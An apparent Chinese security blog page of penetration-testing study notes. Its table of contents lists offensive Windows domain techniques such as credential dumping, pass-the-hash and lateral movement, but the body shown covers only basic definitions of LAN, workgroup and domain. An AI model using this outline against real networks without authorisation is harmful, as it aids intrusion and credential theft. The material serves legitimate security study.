<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="-1 前言：学习来源 123456789文章：理论些:https:&#x2F;&#x2F;github.com&#x2F;SeikoSrp&#x2F;Pentest-Notes简洁些:https:&#x2F;&#x2F;github.com&#x2F;SewellDinG&#x2F;Pentest-Notes书籍：《内网安全攻防：渗透测试实战指南》书籍配套外链:https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1Mn_Z8tfBa6jLr2ZMHG5fKw 提取码：bve8">
<meta property="og:type" content="article">
<meta property="og:title" content="[内网安全]理论篇内网渗透测试基础">
<meta property="og:url" content="https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/index.html">
<meta property="og:site_name" content="TonyD0g">
<meta property="og:description" content="-1 前言：学习来源 123456789文章：理论些:https:&#x2F;&#x2F;github.com&#x2F;SeikoSrp&#x2F;Pentest-Notes简洁些:https:&#x2F;&#x2F;github.com&#x2F;SewellDinG&#x2F;Pentest-Notes书籍：《内网安全攻防：渗透测试实战指南》书籍配套外链:https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1Mn_Z8tfBa6jLr2ZMHG5fKw 提取码：bve8">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQ3M8.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQ8sS.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQ0zV.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQGqg.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQNIs.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQain.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQdGq.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQwR0.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQtaj.png">
<meta property="og:image" content="https://s4.ax1x.com/2022/02/04/HeQYZQ.png">
<meta property="article:published_time" content="2022-03-03T07:23:24.000Z">
<meta property="article:modified_time" content="2023-07-20T07:35:17.374Z">
<meta property="article:author" content="TonyD0g">
<meta property="article:tag" content="内网安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s4.ax1x.com/2022/02/04/HeQ3M8.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>[内网安全]理论篇内网渗透测试基础</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2022/03/22/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E7%AF%87CobaltStrike%E5%9F%BA%E7%A1%80%E4%BD%BF%E7%94%A8/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2022/02/23/%E8%84%9A%E6%9C%AC%E5%B0%8F%E5%AD%90%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&text=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&is_video=false&description=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[内网安全]理论篇内网渗透测试基础&body=Check out this article: https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&name=[内网安全]理论篇内网渗透测试基础&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&t=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-前言："><span class="toc-number">1.</span> <span class="toc-text">-1 前言：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0-内网渗透测试基础"><span class="toc-number">2.</span> <span class="toc-text">0.内网渗透测试基础:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-内网"><span class="toc-number">2.1.</span> <span class="toc-text">1.内网:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-工作组"><span class="toc-number">2.2.</span> <span class="toc-text">2.工作组:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-域"><span class="toc-number">2.3.</span> <span class="toc-text">3.域:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#域信任"><span class="toc-number">2.3.1.</span> <span class="toc-text">域信任</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-活动目录"><span class="toc-number">2.4.</span> <span class="toc-text">4.活动目录:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#活动目录有什么功能"><span class="toc-number">2.4.1.</span> <span class="toc-text">活动目录有什么功能?</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-DC和AD区别？"><span class="toc-number">2.5.</span> <span class="toc-text">5.DC和AD区别？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-安全域的划分"><span class="toc-number">2.6.</span> <span class="toc-text">6.安全域的划分:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-域内计算机分类"><span class="toc-number">2.7.</span> <span class="toc-text">7.域内计算机分类:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-域内权限"><span class="toc-number">2.8.</span> <span class="toc-text">8.域内权限:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-组织单元ou"><span class="toc-number">2.9.</span> <span class="toc-text">9.组织单元ou:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-内网协议"><span class="toc-number">2.10.</span> <span class="toc-text">10.内网协议</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#1-内网信息搜集"><span class="toc-number">3.</span> <span class="toc-text">1.内网信息搜集:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#一、收集本机信息"><span class="toc-number">3.1.</span> <span class="toc-text">一、收集本机信息</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-查询网络配置命令："><span class="toc-number">3.1.1.</span> <span class="toc-text">1.查询网络配置命令：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-查询操作系统及软件的信息"><span class="toc-number">3.1.2.</span> <span class="toc-text">2.查询操作系统及软件的信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-查询本机服务信息"><span class="toc-number">3.1.3.</span> <span class="toc-text">3.查询本机服务信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-查询进程列表"><span class="toc-number">3.1.4.</span> <span class="toc-text">4.查询进程列表</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#常见杀毒软件进程"><span class="toc-number">3.1.4.1.</span> <span class="toc-text">常见杀毒软件进程</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-查看启动程序信息"><span class="toc-number">3.1.5.</span> <span class="toc-text">5.查看启动程序信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-查看计划任务"><span class="toc-number">3.1.6.</span> <span class="toc-text">6.查看计划任务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-查看主机开机时间"><span class="toc-number">3.1.7.</span> <span class="toc-text">7.查看主机开机时间</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-查询用户列表"><span class="toc-number">3.1.8.</span> <span class="toc-text">8.查询用户列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-列出或断开本地计算机与所连接的客户端之间的会话"><span class="toc-number">3.1.9.</span> <span class="toc-text">9.列出或断开本地计算机与所连接的客户端之间的会话</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#10-查询端口列表"><span class="toc-number">3.1.10.</span> <span class="toc-text">10.查询端口列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#11-查询补丁列表"><span class="toc-number">3.1.11.</span> <span class="toc-text">11.查询补丁列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#12-查询本机共享列表"><span class="toc-number">3.1.12.</span> <span class="toc-text">12.查询本机共享列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#13-查询路由表及所有可用接口的ARP缓存表"><span class="toc-number">3.1.13.</span> <span class="toc-text">13.查询路由表及所有可用接口的ARP缓存表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#14-查询防火墙相关配置"><span class="toc-number">3.1.14.</span> <span class="toc-text">14.查询防火墙相关配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#15-查看代理配置情况"><span class="toc-number">3.1.15.</span> <span class="toc-text">15.查看代理配置情况</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#16-查询并开启远程连接服务"><span class="toc-number">3.1.16.</span> <span class="toc-text">16.查询并开启远程连接服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#17-自动收集信息"><span class="toc-number">3.1.17.</span> <span class="toc-text">17. 自动收集信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#18-Empire下的主机信息收集"><span class="toc-number">3.1.18.</span> <span class="toc-text">18.Empire下的主机信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#19-查询当前权限"><span class="toc-number">3.1.19.</span> <span class="toc-text">19. 查询当前权限</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#二、收集域内信息"><span class="toc-number">3.2.</span> <span class="toc-text">二、收集域内信息</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-判断是否存在域"><span class="toc-number">3.2.1.</span> <span class="toc-text">1.判断是否存在域</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-探测域内存活主机"><span class="toc-number">3.2.2.</span> <span class="toc-text">2. 探测域内存活主机</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-扫描域内端口"><span class="toc-number">3.2.3.</span> <span class="toc-text">3.扫描域内端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-收集域内基础信息"><span class="toc-number">3.2.4.</span> <span class="toc-text">4. 收集域内基础信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-查找域控"><span class="toc-number">3.2.5.</span> <span class="toc-text">5. 查找域控</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-获取域内的用户和管理员信息"><span class="toc-number">3.2.6.</span> <span class="toc-text">6. 获取域内的用户和管理员信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-定位域管理员"><span class="toc-number">3.2.7.</span> <span class="toc-text">7. 定位域管理员</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-查找域管理进程"><span class="toc-number">3.2.8.</span> <span class="toc-text">8. 查找域管理进程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#三、自动化信息收集"><span class="toc-number">3.3.</span> <span class="toc-text">三、自动化信息收集:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-隐藏通信隧道技术"><span class="toc-number">4.</span> <span class="toc-text">2.隐藏通信隧道技术</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-判断内网的连通性"><span class="toc-number">4.1.</span> <span class="toc-text">1.判断内网的连通性</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-网络层隧道技术（IPv6、ICMP）"><span class="toc-number">4.2.</span> <span class="toc-text">2.网络层隧道技术（IPv6、ICMP）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-传输层隧道技术（TCP、UDP）"><span class="toc-number">4.3.</span> <span class="toc-text">3.传输层隧道技术（TCP、UDP）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-应用层隧道技术（SSH、HTTP-s、DNS）"><span class="toc-number">4.4.</span> <span class="toc-text">4.应用层隧道技术（SSH、HTTP&#x2F;s、DNS）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-SOCKS代理"><span class="toc-number">4.5.</span> <span class="toc-text">5.SOCKS代理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-压缩数据"><span class="toc-number">4.6.</span> <span class="toc-text">6.压缩数据</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-上传和下载"><span class="toc-number">4.7.</span> <span class="toc-text">7.上传和下载</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-权限维持分析及防御"><span class="toc-number">5.</span> <span class="toc-text">3.权限维持分析及防御:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#操作系统后门"><span class="toc-number">5.1.</span> <span class="toc-text">操作系统后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web后门"><span class="toc-number">5.2.</span> <span class="toc-text">Web后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#域控制器权限持久化"><span class="toc-number">5.3.</span> <span class="toc-text">域控制器权限持久化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#利用系统功能"><span class="toc-number">5.3.1.</span> <span class="toc-text">利用系统功能</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PTT-伪造票据"><span class="toc-number">5.3.2.</span> <span class="toc-text">PTT 伪造票据</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#大致步骤："><span class="toc-number">5.3.2.1.</span> <span class="toc-text">大致步骤：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#其他方法"><span class="toc-number">5.3.3.</span> <span class="toc-text">其他方法</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-权限提升及防御"><span class="toc-number">6.</span> <span class="toc-text">4.权限提升及防御:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#内核溢出漏洞"><span class="toc-number">6.1.</span> <span class="toc-text">内核溢出漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#系统配置错误"><span class="toc-number">6.2.</span> <span class="toc-text">系统配置错误</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#组策略首选项提权漏洞"><span class="toc-number">6.3.</span> <span class="toc-text">组策略首选项提权漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#绕过UAC提权"><span class="toc-number">6.4.</span> <span class="toc-text">绕过UAC提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#令牌窃取"><span class="toc-number">6.5.</span> <span class="toc-text">令牌窃取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#无凭证条件下的权限获取"><span class="toc-number">6.6.</span> <span class="toc-text">无凭证条件下的权限获取</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-域控制器安全"><span class="toc-number">7.</span> <span class="toc-text">5.域控制器安全</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#使用卷影拷贝服务提取ntds-dit"><span class="toc-number">7.1.</span> <span class="toc-text">使用卷影拷贝服务提取ntds.dit</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#导出ntds-dit中的散列值"><span class="toc-number">7.2.</span> <span class="toc-text">导出ntds.dit中的散列值</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用dcsync获取域散列值"><span class="toc-number">7.3.</span> <span class="toc-text">利用dcsync获取域散列值</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#其他获取域散列值方法"><span class="toc-number">7.4.</span> <span class="toc-text">其他获取域散列值方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Kerberos域用户提权漏洞"><span class="toc-number">7.5.</span> <span class="toc-text">Kerberos域用户提权漏洞</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6-域内横向移动分析及防御"><span class="toc-number">8.</span> <span class="toc-text">6.域内横向移动分析及防御:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-IPC"><span class="toc-number">8.1.</span> <span class="toc-text">1.IPC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-at-Windows-server-2008之前-计划任务命令"><span class="toc-number">8.2.</span> <span class="toc-text">2.at(Windows server 2008之前)计划任务命令:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-schtasks"><span class="toc-number">8.3.</span> <span class="toc-text">3.schtasks</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-HashDump"><span class="toc-number">8.4.</span> <span class="toc-text">4.HashDump</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-mimikatz"><span class="toc-number">8.5.</span> <span class="toc-text">5.mimikatz:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-破解hash-防范方法"><span class="toc-number">8.6.</span> <span class="toc-text">6.破解hash,防范方法:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-哈希传递攻击-PTH-需要本地管理员权限"><span class="toc-number">8.7.</span> <span class="toc-text">7.哈希传递攻击:PTH(需要本地管理员权限)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-PTT-票据传递-不需要本地管理员权限"><span class="toc-number">8.8.</span> <span class="toc-text">8.PTT(票据传递,不需要本地管理员权限):</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-PsExec"><span class="toc-number">8.9.</span> <span class="toc-text">9.PsExec</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-WMI"><span class="toc-number">8.10.</span> <span class="toc-text">10.WMI</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-DCOM"><span class="toc-number">8.11.</span> <span class="toc-text">11.DCOM</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12-SPN"><span class="toc-number">8.12.</span> <span class="toc-text">12.SPN</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#13-Exchange"><span class="toc-number">8.13.</span> <span class="toc-text">13.Exchange</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#7-跨域攻击分析及防御"><span class="toc-number">9.</span> <span class="toc-text">7.跨域攻击分析及防御</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#跨域攻击方法"><span class="toc-number">9.1.</span> <span class="toc-text">跨域攻击方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#域信任关系"><span class="toc-number">9.2.</span> <span class="toc-text">域信任关系</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#防范跨域攻击"><span class="toc-number">9.3.</span> <span class="toc-text">防范跨域攻击</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [内网安全]理论篇内网渗透测试基础
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">TonyD0g</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-03-03T07:23:24.000Z" itemprop="datePublished">2022-03-03</time>
        
        (Updated: <time datetime="2023-07-20T07:35:17.374Z" itemprop="dateModified">2023-07-20</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" rel="tag">内网安全</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <span id="more"></span>

<h1 id="1-前言："><a href="#1-前言：" class="headerlink" title="-1 前言："></a>-1 前言：</h1><p>学习来源</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">文章：</span><br><span class="line">理论些:</span><br><span class="line">https://github.com/SeikoSrp/Pentest-Notes</span><br><span class="line">简洁些:</span><br><span class="line">https://github.com/SewellDinG/Pentest-Notes</span><br><span class="line"></span><br><span class="line">书籍：</span><br><span class="line">《内网安全攻防：渗透测试实战指南》</span><br><span class="line">书籍配套外链:https://pan.baidu.com/s/1Mn_Z8tfBa6jLr2ZMHG5fKw 提取码：bve8 </span><br></pre></td></tr></table></figure>



<h1 id="0-内网渗透测试基础"><a href="#0-内网渗透测试基础" class="headerlink" title="0.内网渗透测试基础:"></a>0.内网渗透测试基础:</h1><p>《内网安全攻防：渗透测试实战指南》第1章：内网渗透测试基础</p>
<p>本章系统地讲解了内网工作组、域、活动目录、域内权限解读等，并介绍了内网域环境和渗透测试环境（Windows、Linux）的搭建方法和常用的渗透测试工具。</p>
<h2 id="1-内网"><a href="#1-内网" class="headerlink" title="1.内网:"></a>1.内网:</h2><p><strong>内网</strong>(也指局域网Local Area Network)，LAN是指在某一区域内由多台计算机互联成的计算机组。</p>
<h2 id="2-工作组"><a href="#2-工作组" class="headerlink" title="2.工作组:"></a>2.工作组:</h2><p><strong>工作组（Work Group）就像一个可以自由进入和退出的社团</strong>，方便同组的计算机互相访问。没有集中管理作用，<br>所有计算机都是<strong>对等的</strong>。</p>
<h2 id="3-域"><a href="#3-域" class="headerlink" title="3.域:"></a>3.域:</h2><p><strong>域（Domain）是一个有安全边界的计算机集合</strong>。 可以简单的把域理解成升级版的工作组，但有一个严格的集中管理控制机制。</p>
<p><strong>域控制器（Domain Controller，DC）相当于一个单位的门禁系统。</strong><br>DC中存在由这个域的账户、密码、属于这个域的计算机等信息构成的<strong>数据库</strong>。<strong>DC是整个域的通信枢纽。</strong></p>
<p><strong>域环境：单域、父域和子域、域树（tree）、域森林（forest，林）、DNS域名服务器</strong></p>
